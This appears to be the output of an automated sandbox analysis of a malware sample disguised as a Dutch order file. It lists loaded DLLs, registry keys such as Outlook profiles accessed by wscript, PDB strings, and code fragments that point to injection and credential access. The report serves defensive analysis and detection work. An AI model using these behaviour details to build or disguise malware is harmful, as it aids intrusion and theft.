                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: urlmon.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: iertutil.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: srvcli.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: netutils.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: uxtheme.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wldp.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: propsys.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: profapi.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: edputil.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sspicli.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wintypes.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: appresolver.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: bcp47langs.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: slc.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: userenv.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sppc.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: vcruntime140.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: version.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: urlmon.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: msvcp140.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: iertutil.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: srvcli.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: netutils.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Nieuwebestellingen10122024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Nieuwebestellingen10122024.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: iexplore.pdbUGP source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: Microsoft.CSharp.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdbUGP source: iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000005.00000002.2333103481.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2231798388.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000005.00000003.2234062433.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, wscript.exe, 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2327905828.0000000004560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2334874427.0000000004711000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wscript.pdb source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: wscript.pdbGCTL source: iexplore.exe, 00000005.00000003.2328045546.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000B.00000002.4499330641.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdbP/ source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tCyxXhRNgdPI.exe, 0000000B.00000000.2249922753.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4499475516.0000000000CDE000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Dynamic.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Drawing.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: mscorlib.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Management.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.ni.pdb source: WER5822.tmp.dmp.8.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER5822.tmp.dmp.8.dr
                Source: Binary string: iexplore.pdb source: wscript.exe, 0000000C.00000002.4501045338.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 0000000C.00000002.4499908466.0000000002CC8000.00000004.00000020.00020000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000000.2400868410.000000000277C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2664175943.000000003870C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847152C45 push ss; retn 5F4Ch0_2_00007FF847176317
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF8471500BD pushad ; iretd 0_2_00007FF8471500C1
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847155661 pushfd ; retf 0_2_00007FF847155991
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF847155992 push edx; retf 0_2_00007FF8471559DB
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeCode function: 0_2_00007FF84726015E push esp; retf 4810h0_2_00007FF847260762
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_048F09AD push ecx; mov dword ptr [esp], ecx12_2_048F09B6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036F465 push 2BE5A8CCh; ret 12_2_0036F46A
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00370880 push ebx; ret 12_2_00370881
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036BA6A push eax; ret 12_2_0036BA74
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036DBC0 push es; iretd 12_2_0036DBC1
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_00363FC2 push ebx; iretd 12_2_00363FC5
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047164CB push esp; retf 12_2_047164EA
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04717516 push eax; iretd 12_2_04717527
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04714627 push ds; retf 12_2_04714756
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047146F6 push ds; retf 12_2_04714756
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04725032 push eax; ret 12_2_04725034
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047160E5 push ebx; iretd 12_2_047160E6
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047251EC push eax; retf 12_2_047256D5
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_047163FC push esp; retf 12_2_047164EA
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE449D pushfd ; retf 13_2_04BE44A1
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exeCode function: 13_2_04BE5833 push ebx; iretd 13_2_04BE5836
